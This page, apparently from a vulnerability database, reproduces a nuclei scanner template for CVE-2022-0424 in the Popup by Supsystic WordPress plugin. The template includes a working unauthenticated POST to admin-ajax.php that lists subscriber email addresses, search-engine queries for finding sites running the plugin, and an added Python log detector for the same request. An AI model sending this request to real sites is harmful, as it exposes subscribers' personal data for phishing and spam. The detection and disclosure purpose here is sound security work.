
Popup by Supsystic < 1.10.9 - Subscriber Email Addresses Disclosure

02 Jul 2026 09:36:57 · Reported by ProjectDiscovery · Type: nuclei · github.com

Popup by Supsystic < 1.10.9 - Subscriber Email Addresses Disclosure in WordPress

id: CVE-2022-0424

info:
  name: Popup by Supsystic < 1.10.9 - Subscriber Email Addresses Disclosure
  author: s4e-io
  severity: medium
  description: |
    The Popup by Supsystic WordPress plugin before 1.10.9 does not have any authentication and authorisation in an AJAX action, allowing unauthenticated attackers to call it and get the email addresses of subscribed users
  impact: |
    Unauthenticated attackers can obtain email addresses of all subscribed users via an unprotected AJAX endpoint, potentially facilitating phishing campaigns or spam attacks.
  remediation: Fixed in 1.10.9
  reference:
    - https://wpscan.com/vulnerability/1e4593fd-51e5-43ca-a244-9aaef3804b9f/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0424
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-0424
    cwe-id: CWE-306
    epss-score: 0.0269
    epss-percentile: 0.84025
    cpe: cpe:2.3:a:supsystic:popup:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: supsystic
    product: popup
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/popup-by-supsystic
    fofa-query: body=/wp-content/plugins/popup-by-supsystic
    publicwww-query: "/wp-content/plugins/popup-by-supsystic"
  tags: wpscan,cve,cve2022,wp,wp-plugin,wordpress,disclosure,popup,supsystic,vuln

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        page=subscribe&action=getListForTbl&reqType=ajax&search=@&_search=false&pl=pps&sidx=id&rows=10

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"id":"'
          - 'username":"'
          - 'email":'
          - 'hash":"'
          - "_wpnonce"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402206910dc96ddd6c2b6f51fad10571c53c196bca3b633fe91bfe155d2b3cbc78c7d022077b62da3f5470eb8b786dd1ffd276f1833bf18fbebb9551bd8845b30577ff487:922c64590222798bb761d5b6d8e72950
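
A defender-side check for the request shown in the template, added here as an example and not part of the template or the plugin: it flags logged POSTs to admin-ajax.php that carry the subscriber-list parameters without a WordPress login cookie. The JSON log layout (`client_ip`, `method`, `uri`, `cookie`, `body`) is an assumed format for a proxy or WAF that records request bodies, and the sample lines are constructed.

```python
import json
from urllib.parse import parse_qs, urlsplit

# Parameters that select the subscriber-list AJAX action (from the template's request body).
SIGNATURE = {"page": "subscribe", "action": "getListForTbl", "pl": "pps"}
LIST_BODY = "page=subscribe&action=getListForTbl&reqType=ajax&search=@&_search=false&pl=pps&sidx=id&rows=10"

def is_unauthenticated_list_call(entry: dict) -> bool:
    """True if the logged request matches the subscriber-list call and has no login cookie."""
    if entry.get("method", "").upper() != "POST":
        return False
    if not urlsplit(entry.get("uri", "")).path.endswith("/wp-admin/admin-ajax.php"):
        return False
    # PHP keeps the last value of a repeated form key, so compare against the last one.
    params = {k: v[-1] for k, v in parse_qs(entry.get("body", "")).items()}
    if any(params.get(key) != want for key, want in SIGNATURE.items()):
        return False
    # WordPress session cookies are named wordpress_logged_in_<hash>; this tests
    # presence only, not validity, so a forged cookie name would not be flagged.
    return "wordpress_logged_in_" not in entry.get("cookie", "")

def flag_requests(log_lines):
    """Return the client IP of every flagged entry; lines that are not JSON objects are skipped."""
    hits = []
    for line in log_lines:
        try:
            entry = json.loads(line)
        except json.JSONDecodeError:
            continue
        if isinstance(entry, dict) and is_unauthenticated_list_call(entry):
            hits.append(entry.get("client_ip"))
    return hits

def sample_line(ip, cookie, body):
    """Build one constructed log line in the assumed JSON layout."""
    return json.dumps({"client_ip": ip, "method": "POST",
                       "uri": "/wp-admin/admin-ajax.php", "cookie": cookie, "body": body})

# Constructed sample log (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    sample_line("203.0.113.7", "", LIST_BODY),                                 # no session: flagged
    sample_line("198.51.100.20", "wordpress_logged_in_abc=admin", LIST_BODY),  # logged-in user
    sample_line("203.0.113.9", "", "action=heartbeat&interval=60"),            # unrelated action
    "truncated log line {",                                                    # malformed entry
]

if __name__ == "__main__":
    print(flag_requests(SAMPLE_LOG))
```

On a site running a version before 1.10.9, any hit means the subscriber list may have been read; upgrading to 1.10.9 is the fix the template names.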

04 Feb 2026 07:00 (current)
Vulners AI Score: 6 (Medium risk)
CVSS 2: 5
CVSS 3.1: 5.3
EPSS: 0.0269